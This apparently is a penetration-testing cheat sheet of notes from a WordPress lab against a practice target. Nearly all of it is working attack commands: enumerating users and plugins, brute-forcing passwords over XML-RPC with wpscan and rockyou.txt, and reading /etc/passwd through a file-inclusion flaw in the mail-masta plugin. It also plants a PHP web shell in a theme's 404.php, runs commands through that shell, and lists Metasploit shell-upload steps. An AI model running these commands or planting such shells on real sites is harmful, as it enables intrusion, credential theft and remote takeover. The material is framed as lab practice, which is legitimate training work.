# Wordpress

{% hint style="info" %}

```shell-session
wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com

```

{% endhint %}

```
// discovering wp version
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2
//via themes
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2

// check user
curl -s -I -X GET http://blog.inlanefreight.com/?author=1

// second method to enumerate users with json request
curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq

// valid creds
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php

// get all methods for xmlrpc
curl -i -s -k -X $'POST' -H $'Host: 138.68.163.76:32302' --data-binary $'<methodCall>\x0d\x0a<methodName>system.listMethods</methodName>\x0d\x0a<params></params>\x0d\x0a</methodCall>\x0d\x0a\x0d\x0a' 'http://138.68.163.76:32302/xmlrpc.php' | wc -l

// wpscan enumeration
wpscan --url http://blog.inlanefreight.com --enumerate --api-token Kffr4fdJzy9qVcTk<SNIP>

// LFI to read passwd
curl http://blog.inlanefreight.com:32302/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

// password attack
wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt

// brute force password attack on xmlrpc
wpscan --password-attack xmlrpc -t 20 -U roger -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com:30594


//edit 404.php of the twentyseventeen theme
// see that the active theme is Transportex so an unused theme 
// such as Twenty Seventeen should be chosen instead.
// Choose a theme and click on Select. Next, choose a non-critical file 
// such as 404.php to modify and add a web shell.
<?php
system($_GET['cmd']);

// RCE via twentyseventeen theme
curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"

//read the flag
curl -X GET "http://blog.inlanefreight.com:30594/wp-content/themes/twentyseventeen/404.php?cmd=cat%20/home/wp-user/flag.txt"

// MSF search wp_admin
//wp_admin_shell_upload
// use 0
// set rhosts blog.inlanefreight.com
// set username admin
// set password ...
// set lhost x.x.x.x
// run

// identified vuln plugin 
// Email Subscribers & Newsletters < 4.2.3 - Multiple Issues
https://wpscan.com/vulnerability/a0764617-6142-4ef7-94f9-1fb923e81e94

```

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FFa4Os3Jgd41jugcSLfGg%2Fimage.png?alt=media\&token=c64cb769-9455-4d67-abec-b56b81abec1c)

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FXBPWfLamNZMtS7OJTAb4%2Fimage.png?alt=media\&token=4226c861-e6a5-4b51-89bd-2e17a9dae7ce)

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FnuCd1dFhCun3SAhEThds%2Fimage.png?alt=media\&token=987ebf8b-6ae2-4762-8763-eeabe082b3a1)

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FeIsFbwbkbURiH60KT3zx%2Fimage.png?alt=media\&token=c815c74d-01fa-40f9-8996-2283e9e3b948)